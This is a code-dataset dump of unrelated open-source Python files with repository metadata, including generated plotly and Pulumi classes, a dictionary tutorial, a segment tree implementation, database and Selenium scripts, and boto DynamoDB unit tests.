range [*min*, *max*], where "min", "max" - dtick values
which describe some zoom level, it is possible to omit
"min" or "max" value by passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are created in the
output figure in addition to any items the figure
already has in this array. You can modify these items
in the output figure by making your own item with
`templateitemname` matching this `name` alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). Has no effect outside of a
template.
templateitemname
Used to refer to a named item in this array in the
template. Named items from the template will be created
even without a matching item in the input figure, but
you can modify one by making an item with
`templateitemname` matching its `name`, alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). If there is no template or no
matching item, this item will be hidden unless you
explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level, the same
as "tickformat"
"""
def __init__(
self,
arg=None,
dtickrange=None,
enabled=None,
name=None,
templateitemname=None,
value=None,
**kwargs,
):
"""
Construct a new Tickformatstop object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of :class:`plotly.graph_objs.splom.marker.c
olorbar.Tickformatstop`
dtickrange
range [*min*, *max*], where "min", "max" - dtick values
which describe some zoom level, it is possible to omit
"min" or "max" value by passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are created in the
output figure in addition to any items the figure
already has in this array. You can modify these items
in the output figure by making your own item with
`templateitemname` matching this `name` alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). Has no effect outside of a
template.
templateitemname
Used to refer to a named item in this array in the
template. Named items from the template will be created
even without a matching item in the input figure, but
you can modify one by making an item with
`templateitemname` matching its `name`, alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). If there is no template or no
matching item, this item will be hidden unless you
explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level, the same
as "tickformat"
Returns
-------
Tickformatstop
"""
super(Tickformatstop, self).__init__("tickformatstops")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.splom.marker.colorbar.Tickformatstop
constructor must be a dict or
an instance of :class:`plotly.graph_objs.splom.marker.colorbar.Tickformatstop`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("dtickrange", None)
_v = dtickrange if dtickrange is not None else _v
if _v is not None:
self["dtickrange"] = _v
_v = arg.pop("enabled", None)
_v = enabled if enabled is not None else _v
if _v is not None:
self["enabled"] = _v
_v = arg.pop("name", None)
_v = name if name is not None else _v
if _v is not None:
self["name"] = _v
_v = arg.pop("templateitemname", None)
_v = templateitemname if templateitemname is not None else _v
if _v is not None:
self["templateitemname"] = _v
_v = arg.pop("value", None)
_v = value if value is not None else _v
if _v is not None:
self["value"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
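# Usage sketch (illustrative values): on a date axis colorbar, a stop such as
#   Tickformatstop(dtickrange=[None, 1000], value="%H:%M:%S.%L ms")
# applies that tick format only while dtick stays below 1000 milliseconds.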
| [
"[email protected]"
] | |
879086db133bd1ab22783e38d697afc115869d4f | 71c4a775c81179e920b72bdee87d9af3edfd4d99 | /01_Sintaxe_Basica/10_dicionario.py | 9ea3b3c107c7a83db1b023da9899d434b0a3d0f8 | [] | no_license | frclasso/acate18122018 | 16f4169dbfb0eb8c25e253965642122e6095a211 | 98e4697d4e34c740a537a553b5ae6841159c58f7 | refs/heads/master | 2020-04-08T00:54:59.822648 | 2019-01-24T16:55:42 | 2019-01-24T16:55:42 | 158,873,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,267 | py | #!/usr/bin/env python3
aluno = {'ID': 1223,
'Nome':'Patricia',
'Idade': 27,
'Curso': 'Sistemas de Informação',
'Turno':'Noturno'
}
print(f"ID: {aluno['ID']}")
print(f"Nome: {aluno['Nome']}")
print(f"Idade:{aluno['Idade']}")
print()
'''Updating existing values'''
aluno['Idade'] = 28
print(aluno)
print()
'''Inserting a new field'''
aluno['Matrícula'] = 8990020198
print(aluno)
print()
# Using the update() method
aluno.update({'Turno':'Diurno', 'Sobrenome':'Nunes', 'Telefone':'(48)555-333'})
print(aluno)
print()
'''Deleting items'''
aluno.__delitem__('Idade')
print(aluno)
print()
aluno.pop('Turno')
print(aluno)
print()
del aluno['Matrícula']
print(aluno)
print()
'''Erasing all the data'''
# aluno.clear()
# print(aluno) # {}
'''Deleting the dictionary itself'''
# del aluno
# print(aluno) # NameError: name 'aluno' is not defined
'''Creating an empty dictionary'''
meuDic = {}
print(meuDic)
print(type(meuDic))
#
print(f'Dictionary size: {len(aluno)} items.')
'''Printing the dictionary keys - keys()'''
print(aluno.keys())
'''Printing the dictionary values - values()'''
print(aluno.values())
'''Printing all the dictionary items - items()'''
print(aluno.items())
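'''Iterating over key/value pairs (illustrative addition)'''
for campo, valor in aluno.items():
    print(f'{campo}: {valor}')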
| [
"[email protected]"
] | |
01e192a4c835a3d6ec4c29d6fb66176e51359dcb | 7c27898a5f85dedf0dbbb12451b6c635861dc197 | /tornado_overview/chapter03/aiomysql_test.py | 8c3375ad203593d54c3a67dc4692f73aa301b121 | [] | no_license | Asunqingwen/Tornado_test_application | 9323d3289fadf69e7b1e7685da8f631d0e88968f | 4f3a9cda9fc081a8b83f06934bc480cd597d4ad8 | refs/heads/master | 2023-02-18T08:43:58.012236 | 2021-01-21T09:59:57 | 2021-01-21T09:59:57 | 330,935,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | import asyncio
import aiomysql
from tornado import gen, ioloop
async def go():
pool = await aiomysql.create_pool(host='192.168.10.69', port=3306,
user='root', password='root',
db='message', charset="utf8")
async with pool.acquire() as conn:
async with conn.cursor() as cur:
await cur.execute("SELECT * from message")
value = await cur.fetchone()
print(cur.description)
print(value)
pool.close()
await pool.wait_closed()
if __name__ == '__main__':
io_loop = ioloop.IOLoop.current()
io_loop.run_sync(go)
| [
"[email protected]"
] | |
b5346db185ed928a79136d01fd3e7a44a8ff0b6e | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/PackDist/share/python/PackDistCommon.py | 0833847cfd1065059cea672b676003e232021674 | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,754 | py | """File: PackDistCommon.py
Common classes and utility functions of the PackDist package.
"""
__author__ = 'Grigori Rybkine <[email protected]>'
__version__ = '0.2.1'
__date__ = 'Wed Oct 03 2012'
__all__ = ['Error', 'InputError', 'CommandError', 'exitstatus']
import sys
import os
class Error(Exception):
"""Base class for exceptions in this module."""
def __str__(self):
return ': '.join([str(arg) for arg in self.args])
def write(self, file = sys.stderr):
print >> file, '%s: %s' % (self.__class__.__name__, self)
class InputError(Error):
"""Exception raised for errors in the input.
Attributes:
expression() -- input expression in which the error occurred
message() -- explanation of the error
"""
def __init__(self, expression, message):
Error.__init__(self, expression, message)
def expression(self):
return self.args[0]
def message(self):
return self.args[1]
class CommandError(Error):
"""Exception raised for errors executing shell commands.
Attributes:
args[0] -- shell command executing which the error occurred
args[1] -- stderr and stdout of the command
args[2] -- exit status of the command
"""
def __init__(self, cmd, output, sc = None):
Error.__init__(self, cmd, output, sc)
def exitstatus(status):
    """Return the child exit status if the child terminated normally, None otherwise.
    Parameter status: child process status information, as returned by
    os.wait() or os.waitpid(), os.system(), the close() method of the file
    object returned by os.popen(), or commands.getstatusoutput().
    """
if os.WIFEXITED(status):
return os.WEXITSTATUS(status)
else:
return None
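# Example (illustrative):
#   sc = os.system('true')
#   exitstatus(sc)  # -> 0 after normal termination, None if killed by a signal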
| [
"[email protected]"
] | |
b0593bc623f07101fd1c4aac9dd0a4ebc0980eb2 | 955b968d46b4c436be55daf8aa1b8fc8fe402610 | /ch04/set_window_size.py | 110459bc02e4e910978194acc115ddfccc6554d7 | [] | no_license | han-huang/python_selenium | 1c8159fd1421b1f0e87cb0df20ae4fe82450f879 | 56f9f5e5687cf533c678a1c12e1ecaa4c50a7795 | refs/heads/master | 2020-03-09T02:24:48.882279 | 2018-04-07T15:06:18 | 2018-04-07T15:06:18 | 128,535,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from selenium import webdriver
driver = webdriver.Firefox()
driver.get("https://mail.google.com")
# The arguments are in pixels
print("Set the browser window to 480 wide by 800 high")
driver.set_window_size(480, 800)
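# A related call (sketch): driver.maximize_window() maximizes the window instead.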
# driver.quit()
| [
"vagrant@LaravelDemoSite"
] | vagrant@LaravelDemoSite |
87fa353d224bca02fb3655134746bec120ffc10b | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/compute/v20191201/gallery_application_version.py | 09d6082a067f10eae575fb0b3681e034d10ed7c2 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 7,987 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['GalleryApplicationVersion']
class GalleryApplicationVersion(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
gallery_application_name: Optional[pulumi.Input[str]] = None,
gallery_application_version_name: Optional[pulumi.Input[str]] = None,
gallery_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
publishing_profile: Optional[pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Specifies information about the gallery Application Version that you want to create or update.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] gallery_application_name: The name of the gallery Application Definition in which the Application Version is to be created.
:param pulumi.Input[str] gallery_application_version_name: The name of the gallery Application Version to be created. Needs to follow semantic version name pattern: The allowed characters are digit and period. Digits must be within the range of a 32-bit integer. Format: <MajorVersion>.<MinorVersion>.<Patch>
:param pulumi.Input[str] gallery_name: The name of the Shared Application Gallery in which the Application Definition resides.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']] publishing_profile: The publishing profile of a gallery Image Version.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if gallery_application_name is None:
raise TypeError("Missing required property 'gallery_application_name'")
__props__['gallery_application_name'] = gallery_application_name
if gallery_application_version_name is None:
raise TypeError("Missing required property 'gallery_application_version_name'")
__props__['gallery_application_version_name'] = gallery_application_version_name
if gallery_name is None:
raise TypeError("Missing required property 'gallery_name'")
__props__['gallery_name'] = gallery_name
if location is None:
raise TypeError("Missing required property 'location'")
__props__['location'] = location
if publishing_profile is None:
raise TypeError("Missing required property 'publishing_profile'")
__props__['publishing_profile'] = publishing_profile
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['replication_status'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute/latest:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190301:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190701:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20200930:GalleryApplicationVersion")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(GalleryApplicationVersion, __self__).__init__(
'azure-nextgen:compute/v20191201:GalleryApplicationVersion',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'GalleryApplicationVersion':
"""
Get an existing GalleryApplicationVersion resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return GalleryApplicationVersion(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publishingProfile")
def publishing_profile(self) -> pulumi.Output['outputs.GalleryApplicationVersionPublishingProfileResponse']:
"""
The publishing profile of a gallery Image Version.
"""
return pulumi.get(self, "publishing_profile")
@property
@pulumi.getter(name="replicationStatus")
def replication_status(self) -> pulumi.Output['outputs.ReplicationStatusResponse']:
"""
This is the replication status of the gallery Image Version.
"""
return pulumi.get(self, "replication_status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
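# Usage sketch (hypothetical resource names; all shown arguments are required):
#   version = GalleryApplicationVersion("appVersion",
#       gallery_application_name="myGalleryApp",
#       gallery_application_version_name="1.0.0",
#       gallery_name="myGallery",
#       location="westus",
#       publishing_profile=GalleryApplicationVersionPublishingProfileArgs(...),
#       resource_group_name="myResourceGroup")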
| [
"[email protected]"
] | |
8e4baaae320644a77b9d51ae74ea221201759574 | 1825283527f5a479204708feeaf55f4ab6d1290b | /leetcode/segmented-tree/leon.py | 9b86c455efa6252c088d2e4fb3ac6b44b59e8988 | [] | no_license | frankieliu/problems | b82c61d3328ffcc1da2cbc95712563355f5d44b5 | 911c6622448a4be041834bcab25051dd0f9209b2 | refs/heads/master | 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 | HTML | UTF-8 | Python | false | false | 6,843 | py | # https://github.com/yuexihan/leonLPST/blob/master/leonLPST.py
from __future__ import division
from six.moves import xrange
class LPSTree:
"""
LPSTree(n[, value=None[, reducef=None[, modulo=None]]]) -> new LPSTree
Build a new LPSTree with n elements.
If value is provided, all elements are set to value, otherwise 0.
    Default reduce function is sum. Can also be set to max or min.
    If modulo is provided, the modulo operation is applied automatically.
"""
def __init__(self, n, value=None, reducef=None, modulo=None):
if n <= 0:
raise ValueError("n most be greater than 0")
self.n = n
        size = 1
        while size < n:
size *= 2
size *= 2
self.size = size
self.tree = [None] * size
self.boolset = [False] * size
self.booladd = [False] * size
self.lazyset = [None] * size
self.lazyadd = [None] * size
self.modulo = modulo
if not reducef:
reducef = sum
if reducef == sum:
self.nodef = (lambda val, n: val*n)
elif reducef == max or reducef == min:
self.nodef = (lambda val, n: val)
else:
raise ValueError("reducef can only be sum, max or min")
if self.modulo:
self.reducef = lambda x: reducef(x) % self.modulo
else:
self.reducef = reducef
if value != None:
array = [value] * n
else:
array = [0] * n
def construct(tree, array, sleft, sright, v):
if sleft+1 == sright:
tree[v] = array[sleft]
return tree[v]
smid = (sleft + sright) // 2
tree[v] = self.reducef((construct(tree, array, sleft, smid, 2*v+1),
construct(tree, array, smid, sright, 2*v+2)))
# if self.modulo:
# tree[v] %= self.modulo
# print tree
return tree[v]
construct(self.tree, array, 0, n, 0)
def __len__(self):
return self.n
def _lazypropagate(self, v, vleft, vright):
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
vmid = (vleft + vright) // 2
# print tree, v, tree[2*v+1], boolset[v], booladd[v]
if boolset[v]:
tree[2*v+1] = self.nodef(lazyset[v], vmid-vleft)
tree[2*v+2] = self.nodef(lazyset[v], vright-vmid)
if self.modulo:
tree[2*v+1] %= self.modulo
tree[2*v+2] %= self.modulo
boolset[2*v+1] = boolset[2*v+2] = True
booladd[2*v+1] = booladd[2*v+2] = False
lazyset[2*v+1] = lazyset[2*v+2] = lazyset[v]
boolset[v] = False
if booladd[v]:
tree[2*v+1] += self.nodef(lazyadd[v], vmid-vleft)
tree[2*v+2] += self.nodef(lazyadd[v], vright-vmid)
if self.modulo:
tree[2*v+1] %= self.modulo
tree[2*v+2] %= self.modulo
if booladd[2*v+1]:
lazyadd[2*v+1] += lazyadd[v]
else:
booladd[2*v+1] = True
lazyadd[2*v+1] = lazyadd[v]
if booladd[2*v+2]:
lazyadd[2*v+2] += lazyadd[v]
else:
booladd[2*v+2] = True
lazyadd[2*v+2] = lazyadd[v]
booladd[v] = False
# print tree, v, tree[2*v+1]
def get(self, start, stop):
"""
LPSTree.get(start, stop) -> value
        You can think of it as reduce(reducef, tree[start:stop]).
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _get(sleft, sright, v, vleft, vright):
# print v, start, stop, vleft, vright, tree
if sleft>=vright or sright <= vleft:
return
if sleft<=vleft and sright >= vright:
# if self.modulo:
# tree[v] %= self.modulo
return tree[v]
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
# print v, start, stop, vleft, vright, tree
return self.reducef([x for x in
(_get(sleft, sright, 2*v+1, vleft, vmid),
_get(sleft, sright, 2*v+2, vmid, vright))
if x != None])
return _get(start, stop, 0, 0, n)
def set(self, start, stop, value):
"""
        LPSTree.set(start, stop, value)
Set all elements in [start, stop) to value.
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _set(sleft, sright, v, vleft, vright, value):
# print v, start, stop, vleft, vright, value, tree
if sleft >= vright or sright <= vleft:
return
if sleft <= vleft and sright >= vright:
tree[v] = self.nodef(value, vright-vleft)
if self.modulo:
tree[v] %= self.modulo
boolset[v] = True
booladd[v] = False
lazyset[v] = value
# print v, tree, tree[v], tree[v] % self.modulo
return
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
_set(sleft, sright, 2*v+1, vleft, vmid, value)
_set(sleft, sright, 2*v+2, vmid, vright, value)
tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
# if self.modulo:
# tree[v] %= self.modulo
# print v, start, stop, vleft, vright, value, tree
_set(start, stop, 0, 0, n, value)
def add(self, start, stop, diff):
"""
        LPSTree.add(start, stop, diff)
Add diff to all elements in [start, stop).
"""
n = self.n
        if not (start < stop and start >= 0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _add(sleft, sright, v, vleft, vright, diff):
if sleft >= vright or sright <= vleft:
return
if sleft <= vleft and sright >= vright:
tree[v] += self.nodef(diff, vright-vleft)
if self.modulo:
tree[v] %= self.modulo
if booladd[v]:
lazyadd[v] += diff
else:
booladd[v] = True
lazyadd[v] = diff
return
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
_add(sleft, sright, 2*v+1, vleft, vmid, diff)
_add(sleft, sright, 2*v+2, vmid, vright, diff)
tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
# if self.modulo:
# tree[v] %= self.modulo
_add(start, stop, 0, 0, n, diff)
def __getitem__(self, index):
return self.get(index, index+1)
def __setitem__(self, index, value):
self.set(index, index+1, value)
def __repr__(self):
return repr([self[x] for x in xrange(self.n)])
def tolist(self):
"""
LPSTree.tolist() -> a list object
Return a list containing all the elements in LPSTree.
"""
return [self[x] for x in xrange(self.n)]
if __name__ == '__main__':
tree = LPSTree(10, reducef=max)
# tree = LPSTree(10, modulo=2)
# tree = LPSTree(10)
print tree.n, tree.size
print tree.get(0, 10)
print tree[0], tree[1]
tree[9] = 20
print tree
print tree.get(0, 10)
tree.set(1,5,5)
print tree
tree.add(1, 10, 12)
print tree
tree.set(0, 3, 5)
tree.add(0, 4, 2)
print tree
tree.set(0, 10, 0)
print tree
tree.add(1, 9, -10)
print tree
print tree.get(8, 9)
tree.set(0, 3, 9)
print tree
tree = LPSTree(10, reducef=max)
print tree
# tree.set(0, 10, 0)
# help(tree.set)
tree.set(1, 9, -10)
print tree
| [
"[email protected]"
] | |
43a228606e02826830759f5f40418f92e634af34 | 19892b65355f7661cf5e42d2f749904788c1a7d0 | /dailyfresh/daily_fresh/utils/mixin.py | 6174e5aba8081e3b2cf0368084ea7f0853225db5 | [] | no_license | BinXiaoEr/daily_fresh | 35902cb6753851a14517265db3738a008610c7d8 | d8bdc10e80b6b8e2be5f85f6a8293fb1f4695e1d | refs/heads/master | 2021-07-09T16:06:34.809134 | 2020-08-04T01:51:34 | 2020-08-04T01:51:34 | 181,276,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | from django.contrib.auth.decorators import login_required
class LoginRequiredMixin(object):
@classmethod
def as_view(cls, **initkwargs):
        # Call the parent class's as_view
view = super(LoginRequiredMixin, cls).as_view(**initkwargs)
return login_required(view) | [
"[email protected]"
] | |
b05acce5674d36ac8d553f00d5fe010f2061fbdf | 612325535126eaddebc230d8c27af095c8e5cc2f | /depot_tools/external_bin/gsutil/gsutil_4.15/gsutil/third_party/boto/tests/unit/dynamodb/test_types.py | e3b913d7eb4a7e8789aa9a1becd8cefa58b17d6a | [
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] | permissive | TrellixVulnTeam/proto-quic_1V94 | 1a3a03ac7a08a494b3d4e9857b24bb8f2c2cd673 | feee14d96ee95313f236e0f0e3ff7719246c84f7 | refs/heads/master | 2023-04-01T14:36:53.888576 | 2019-10-17T02:23:04 | 2019-10-17T02:23:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,427 | py | #!/usr/bin/env python
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from decimal import Decimal
from tests.compat import unittest
from boto.compat import six
from boto.dynamodb import types
from boto.dynamodb.exceptions import DynamoDBNumberError
class TestDynamizer(unittest.TestCase):
def setUp(self):
pass
def test_encoding_to_dynamodb(self):
dynamizer = types.Dynamizer()
self.assertEqual(dynamizer.encode('foo'), {'S': 'foo'})
self.assertEqual(dynamizer.encode(54), {'N': '54'})
self.assertEqual(dynamizer.encode(Decimal('1.1')), {'N': '1.1'})
self.assertEqual(dynamizer.encode(set([1, 2, 3])),
{'NS': ['1', '2', '3']})
self.assertIn(dynamizer.encode(set(['foo', 'bar'])),
({'SS': ['foo', 'bar']}, {'SS': ['bar', 'foo']}))
self.assertEqual(dynamizer.encode(types.Binary(b'\x01')),
{'B': 'AQ=='})
self.assertEqual(dynamizer.encode(set([types.Binary(b'\x01')])),
{'BS': ['AQ==']})
self.assertEqual(dynamizer.encode(['foo', 54, [1]]),
{'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]})
self.assertEqual(dynamizer.encode({'foo': 'bar', 'hoge': {'sub': 1}}),
{'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}})
self.assertEqual(dynamizer.encode(None), {'NULL': True})
self.assertEqual(dynamizer.encode(False), {'BOOL': False})
def test_decoding_to_dynamodb(self):
dynamizer = types.Dynamizer()
self.assertEqual(dynamizer.decode({'S': 'foo'}), 'foo')
self.assertEqual(dynamizer.decode({'N': '54'}), 54)
self.assertEqual(dynamizer.decode({'N': '1.1'}), Decimal('1.1'))
self.assertEqual(dynamizer.decode({'NS': ['1', '2', '3']}),
set([1, 2, 3]))
self.assertEqual(dynamizer.decode({'SS': ['foo', 'bar']}),
set(['foo', 'bar']))
self.assertEqual(dynamizer.decode({'B': 'AQ=='}), types.Binary(b'\x01'))
self.assertEqual(dynamizer.decode({'BS': ['AQ==']}),
set([types.Binary(b'\x01')]))
self.assertEqual(dynamizer.decode({'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]}),
['foo', 54, [1]])
self.assertEqual(dynamizer.decode({'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}}),
{'foo': 'bar', 'hoge': {'sub': 1}})
self.assertEqual(dynamizer.decode({'NULL': True}), None)
self.assertEqual(dynamizer.decode({'BOOL': False}), False)
def test_float_conversion_errors(self):
dynamizer = types.Dynamizer()
# When supporting decimals, certain floats will work:
self.assertEqual(dynamizer.encode(1.25), {'N': '1.25'})
# And some will generate errors, which is why it's best
# to just use Decimals directly:
with self.assertRaises(DynamoDBNumberError):
dynamizer.encode(1.1)
def test_non_boolean_conversions(self):
dynamizer = types.NonBooleanDynamizer()
self.assertEqual(dynamizer.encode(True), {'N': '1'})
def test_lossy_float_conversions(self):
dynamizer = types.LossyFloatDynamizer()
# Just testing the differences here, specifically float conversions:
self.assertEqual(dynamizer.encode(1.1), {'N': '1.1'})
self.assertEqual(dynamizer.decode({'N': '1.1'}), 1.1)
self.assertEqual(dynamizer.encode(set([1.1])),
{'NS': ['1.1']})
self.assertEqual(dynamizer.decode({'NS': ['1.1', '2.2', '3.3']}),
set([1.1, 2.2, 3.3]))
class TestBinary(unittest.TestCase):
def test_good_input(self):
data = types.Binary(b'\x01')
self.assertEqual(b'\x01', data)
self.assertEqual(b'\x01', bytes(data))
def test_non_ascii_good_input(self):
# Binary data that is out of ASCII range
data = types.Binary(b'\x88')
self.assertEqual(b'\x88', data)
self.assertEqual(b'\x88', bytes(data))
@unittest.skipUnless(six.PY2, "Python 2 only")
def test_bad_input(self):
with self.assertRaises(TypeError):
types.Binary(1)
@unittest.skipUnless(six.PY3, "Python 3 only")
def test_bytes_input(self):
data = types.Binary(1)
self.assertEqual(data, b'\x00')
self.assertEqual(data.value, b'\x00')
@unittest.skipUnless(six.PY2, "Python 2 only")
def test_unicode_py2(self):
# It's dirty. But remains for backward compatibility.
data = types.Binary(u'\x01')
self.assertEqual(data, b'\x01')
self.assertEqual(bytes(data), b'\x01')
# Delegate to built-in b'\x01' == u'\x01'
# In Python 2.x these are considered equal
self.assertEqual(data, u'\x01')
# Check that the value field is of type bytes
self.assertEqual(type(data.value), bytes)
@unittest.skipUnless(six.PY3, "Python 3 only")
def test_unicode_py3(self):
with self.assertRaises(TypeError):
types.Binary(u'\x01')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
